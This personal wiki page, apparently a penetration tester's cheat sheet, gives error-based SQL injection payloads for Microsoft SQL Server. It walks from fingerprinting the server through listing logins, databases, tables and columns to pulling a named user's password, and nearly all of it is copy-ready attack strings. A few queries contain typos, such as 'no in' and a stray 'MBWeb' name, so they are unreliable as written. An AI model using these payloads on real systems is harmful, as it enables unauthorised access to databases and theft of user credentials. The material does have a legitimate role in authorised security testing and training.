SQl Injection Recipes

From Rory.wiki

Jump to: navigation, search

Ok so this is designed to be a series of "recipes" with indicative queries which help in different situations. Personally I can never remember all the ins and outs of SQL syntax off the top of my head so writing these out will hopefully help :)

Error Based MS-SQL in a SELECT statement

For use when the initial ' character brings back an SQL error message but it's not possible to get a viable UNION statement working to get the information queried back to the machine. You will still need to match the number of parameters in the UNION so placing 1, a number of times before the CAST statement when you get this error, should sort that. 

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
' UNION SELECT cast(@@version as int);--

the number of quotes at the start of the query may vary based on what's required to close out open quotes. Also adding ) characters might be needed to close out open brackets.

This'll return the Version of the database in an error message. 

' UNION SELECT cast(host_name() as int);--

Will return the host name of the database server. 

 ' UNION SELECT cast(user_name() as int);--

So if you can't get UNION returning to the screen it'll be necessary to bring back individual items as error messages 

 ' UNION SELECT TOP 1 cast(name as int) from master..syslogins;--

this brings back the first name out of the syslogins table. The idea then to produce others is to make use of "NOT IN" and "WHERE" add-ons to the query so assuming the 1st name that was returned was sa, you could use this query to get the next one. 

 ' UNION SELECT TOP 1 cast(name as int) from master..syslogins where name no in ('sa');--

Other helpful areas which follow the same concept are

This provides a database name and the list of Not in's can be added to 

'' UNION SELECT TOP 1 cast(name as int) FROM master..sysdatabases where name not in ("master","tempdb","model","msdb") ;--

This provides a table name from the database "DBName" 

'' UNION SELECT TOP 1 cast(name as int) FROM DBName..sysobjects where xtype="U" AND name NOT IN ("tableOne");--

This looks for column names containing the string login in a database called DBName and a table called TableName 

'' UNION SELECT TOP 1 cast(DBName..syscolumns.name as int) from DBName..syscolumns,DBName..sysobjects WHERE DBName..syscolumns.id=DBName..sysobjects.id AND DBname..sysobjects.name="TableName" AND MBWeb..syscolumns.name LIKE "%login%";--

Assuming you then find a column called "loginname" you can use this kind of query to get entries out of it 

'' UNION SELECT TOP 1 cast(DBName..TableName.loginname as int) from DBName..TableNAme where DBName..TableName.loginname;--

And then assuming there's a user called rorym in that table, getting a password for them would go something like 

'' UNION SELECT TOP 1 cast(DBName..TableName.password as int) from DBName..TableName where DBName..TableName.loginname LIKE ("rorym");--
Retrieved from "http://wiki.mccune.org.uk/index.php/SQl_Injection_Recipes"
Personal tools